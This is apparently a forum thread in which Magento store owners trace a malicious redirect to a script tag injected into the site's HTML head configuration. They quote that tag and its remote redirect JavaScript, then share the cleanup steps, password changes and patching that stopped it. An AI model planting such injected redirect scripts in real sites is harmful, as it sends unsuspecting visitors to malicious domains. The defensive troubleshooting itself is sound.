Maybe it's infected by some virus.
My website starts redirecting to these infected URL.
http://mon.setsu.xyz
and some time https://tiphainemollard.us/index/?1371499155545
Infected links
what I did to solve.
- Commented .htaccess file ( nothing happen)
- Commented include folder ( nothing happen)
- Scanned complete server ( nothing happen no virus malware found)
- Changed CSS, media and js path from the database just to ensure that weather its PHP or any js is doing ( nothing happen)
select * from core_config_data where path like '%secure%';
all links are ok
UPDATE
I googled and many articles were written on this but they suggest it was a browser issue or my system is infected. An article on this
even if I open the site on my phone or on my personal laptop, issues are same.
UPDATE 2
I found the row in the database which is affected. ( as Boris K. also saying)
In the core_config_data
table design/head/includes
value have a
<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>
Which will be inserted in head section on page load.
If you visit the above URL you will get a script of redirect which is
var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');
if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){
var idToRedirect = document.currentScript.getAttribute('id');
window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}
Client website is working from afternoon once I removed that script. But the main problem is how that script inserted into the database.
One patch is also outdated so I updated that patch also.
UPDATE 3
The site is infected again.
This is the script inserted in Admin section ( Admin->Configuration->General->Design->HTML Head->Miscellaneous Script)
I don't know what to do now.
As I changed every password,
Deleted all old users.
UPDATE 3
Till now that error doesn't come so it means by following the above steps we can overcome this issue.
UPDATE::4
Always install patches as it helps me in projects to make store less prone to these type of issues and patches are important as well.
One can use https://magescan.com/ to check the issues on their website.
Best Answer
I found the injected code in the
core_config_data
table, underdesign/head/includes
. Removed it and now the site is back to normal.UPDATE: As everyone else mentioned, it happened again this morning. This time I got rid of it more easily from the Admin Panel under
System > Configuration > General > Design > HTML Head > Miscellaneous Scripts
. This is a huge vulnerability, I hope Magento is working on a patch.UPDATE 2: The script came back again, so I changed the db password, cleared cache. About an hour later, the script is back. So I don't think it's being added thru the db. I just changed my admin password, let's see if it comes back again.
UPDATE 3: Since I changed the admin password yesterday on both of my affected sites, about 24 hours later both are still clean.